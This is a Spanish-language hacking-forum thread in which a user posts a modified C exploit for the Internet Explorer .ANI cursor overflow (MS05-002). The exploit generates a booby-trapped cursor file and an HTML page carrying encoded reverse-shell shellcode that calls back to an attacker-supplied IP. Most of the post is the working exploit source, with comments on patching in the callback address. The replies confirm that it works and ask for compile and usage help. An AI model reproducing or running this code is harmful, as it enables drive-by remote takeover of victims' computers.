Microsoft Internet Explorer .ANI Files reverse shell exploit...

[LoReDo]

Despues de haber estado trasteando unas horas con el exploit original: http://foro.elhacker.net/index.php/topic,54746.0.html , lo he modificado para que al producirse el buffer overflow ejecute una reverse shellcode, conectándose a una IP determinada por el puerto 8721.

La shellcode es la misma de exploit GDI+ y la misma que usamos Gospel y yo en la modificación del bug del IFRAME.

Espero que le saqueis partido al exploit..

Código:

/* Added string.h /str0ke */
/* HOD-ms05002-ani-expl.c: 2005-01-10: PUBLIC v.0.2
 *
 * Copyright (c) 2004-2005 houseofdabus, (modificado por LoReDo para elhacker.net).
 *   Compilado con VC++  6
 *
 * (MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit
 * (CAN-2004-1049)
 *
 *
 *
 *                 .::[ houseofdabus ]::.
 *
 *
 *
 * (universal -- for all affected systems)
 * ---------------------------------------------------------------------
 * Description:
 *    A remote code execution vulnerability exists in the way that
 *    cursor, animated cursor, and icon formats are handled. An attacker
 *    could try to exploit the vulnerability by constructing a malicious
 *    cursor or icon file that could potentially allow remote code
 *    execution if a user visited a malicious Web site or viewed a
 *    malicious e-mail message. An attacker who successfully exploited
 *    this vulnerability could take complete control of an affected
 *    system.
 *
 * ---------------------------------------------------------------------
 * Patch:
 *    http://www.microsoft.com/technet/security/Bulletin/MS05-002.mspx
 *
 * ---------------------------------------------------------------------
 * Tested on:
 *    - Windows Server 2003
 *    - Windows XP SP1
 *    - Windows XP SP0
 *    - Windows 2000 SP4
 *    - Windows 2000 SP3
 *    - Windows 2000 SP2
 *
 * ---------------------------------------------------------------------
 * Compile:
 *
 * Win32/VC++  : cl -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Win32/cygwin: gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 * Linux       : gcc -o HOD-ms05002-ani-expl HOD-ms05002-ani-expl.c
 *
 * ---------------------------------------------------------------------
 * Example:
 *
 * C:\>HOD-ms05002-ani-expl.exe poc 7777
 * <...>
 * [*] Creating poc.ani file ... Ok
 * [*] Creating poc.html file ... Ok
 *
 * C:\>
 *
 * start IE -> C:\poc.html
 *
 * C:\>telnet localhost 7777
 * Microsoft Windows 2000 [Version 5.00.2195]
 * (C) Copyright 1985-2000 Microsoft Corp.
 *
 * C:\Documents and Settings\Administrator\Desktop>
 *
 * ---------------------------------------------------------------------
 *
 *   This is provided as proof-of-concept code only for educational
 *   purposes and testing by authorized individuals with permission to
 *   do so.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* ANI header */
unsigned char aniheader[] =
"\x52\x49\x46\x46\x9c\x18\x00\x00\x41\x43\x4f\x4e\x61\x6e\x69\x68"
"\x7c\x03\x00\x00\x24\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

/* jmp offset, no Jitsu */
"\x77\x82\x40\x00\xeb\x64\x90\x90\x77\x82\x40\x00\xeb\x64\x90\x90"
"\xeb\x54\x90\x90\x77\x82\x40\x00\xeb\x54\x90\x90\x77\x82\x40\x00"
"\xeb\x44\x90\x90\x77\x82\x40\x00\xeb\x44\x90\x90\x77\x82\x40\x00"
"\xeb\x34\x90\x90\x77\x82\x40\x00\xeb\x34\x90\x90\x77\x82\x40\x00"
"\xeb\x24\x90\x90\x77\x82\x40\x00\xeb\x24\x90\x90\x77\x82\x40\x00"
"\xeb\x14\x90\x90\x77\x82\x40\x00\xeb\x14\x90\x90\x77\x82\x40\x00"
"\x77\x82\x40\x00\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";


/* reverse shellcode */
unsigned char shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\x52" //x52 es el primer número de la IP
"\x3A\x93\xB0\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7" //IP por defecto: 192.168.1.34 XOREADA con 0x92
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54" //: 52.3A.93.B0
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

unsigned char discl[] =
"This is provided as proof-of-concept code only for educational"
" purposes and testing by authorized individuals with permission"
" to do so.";

unsigned char html[] =
"<html>\n"
"<head>\n"
"\t<style>\n"
"\t\t* {CURSOR: url(\"%s.ani\")}\n"
"\t</style>"
"\n</head>\n"
"</html>";
void
usage(char *prog)
{
printf("Usage:\n");
printf("%s <filehtml> <reverse IP>\n\n", prog);
exit(0);
}


unsigned char xor_data(unsigned char byte)
{
return(byte ^ 0x92);
}

int
main(int argc, char **argv)
{
FILE *fp;
unsigned char f[256+5] = "";
unsigned char anib[912] = "";
int raw_num = 0;
char *p1 = NULL, *p2 = NULL;
char ip_addr[256];
char str_num[16];

printf("\n(MS05-002) Microsoft Internet Explorer .ANI Files Handling Exploit\n\n");
printf("\tCopyright (c) 2004-2005 .: houseofdabus (modificado por LoReDo) :.\n");
printf("\t.:Para elhacker.net:.\n\n\n");
printf("Tested on all affected systems:\n");
printf("   [+] Windows Server 2003\n   [+] Windows XP SP1, SP0\n");
printf("   [+] Windows 2000 All SP\n\n");

printf("%s\n\n", discl);
if ( (sizeof(shellcode)-1) > (912-sizeof(aniheader)-3) ) {
printf("[-] Size of shellcode must be <= 686 bytes\n");
return 0;
}
if (argc < 3) usage(argv[0]);

if (strlen(argv[1]) > 256) {
printf("[-] Size of filename must be <=256 bytes\n");
return 0;
}

/* creating ani file */
strcpy(f, argv[1]);
strcat(f, ".ani");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
memset(anib, 0x90, 912);

/* header */
memcpy(anib, aniheader, sizeof(aniheader)-1);
/* shellcode */

// copia el argumento 2 (IP) a ip_addr
strncpy(ip_addr, argv[2], 20);

// Va XOREANDO cada trozo de IP con 0x92 y lo pega en la posición correspondiente de la shellcode
p1 = strchr(ip_addr, '.');
strncpy(str_num, ip_addr, p1 - ip_addr);
raw_num = atoi(str_num);
shellcode[179] = xor_data((char)raw_num);

p2 = strchr(p1+1, '.');
strncpy(str_num, ip_addr + (p1 - ip_addr) + 1, p2 - p1);
raw_num = atoi(str_num);
shellcode[180] = xor_data((char)raw_num);

p1 = strchr(p2+1, '.');
strncpy(str_num, ip_addr + (p2 - ip_addr) + 1, p1 - p2);
raw_num = atoi(str_num);
shellcode[181] = xor_data((char)raw_num);

p2 = strrchr(ip_addr, '.');
strncpy(str_num, p2+1, 5);
raw_num = atoi(str_num);
shellcode[182] = xor_data((char)raw_num);

memcpy(anib+sizeof(aniheader)-1, shellcode, sizeof(shellcode)-1);

fwrite(anib, 1, 912, fp);
printf(" Ok\n");
fclose(fp);

/* creating html file */
f[0] = '\0';
strcpy(f, argv[1]);
strcat(f, ".html");
printf("[*] Creating %s file ...", f);
fp = fopen(f, "wb");
if (fp == NULL) {
printf("\n[-] error: can\'t create file: %s\n", f);
return 0;
}
sprintf(anib, html, argv[1]);
fwrite(anib, 1, strlen(anib), fp);
printf(" Ok\n");
fclose(fp);

return 0;
}

Un saludo^^

[Gospel]

Wuay... así resulta más cómodo!

Gracias LoReDo 

Salu2

[Isirius]

me podeis da r por favor el enlace de donde descargar ese copilador es qe no lo encuentro gracias es que con el Dev C++ me da errores Gracias.

[zhyzura]

funciona!! xD

gracias LoReDo por tu aporte al foro 

[Cab Calloway]

Yo lo compilo con GCC y me tira errores, seguramente por las librerias, k no las tengo

De donde las bajo?

Saludos!

[Nosferatu]

Hola kasswed, yo tambien lo he compilado sin ningun problema. A mi tambien el gcc me tiraba errores pero asi me ha funcionado perfectamente

$gcc-3.3 -o exploit exploit.c

asi perfectamente
Una duda. no me entero bien del asunto.. como se usa? es decir, que es eso de filehtml?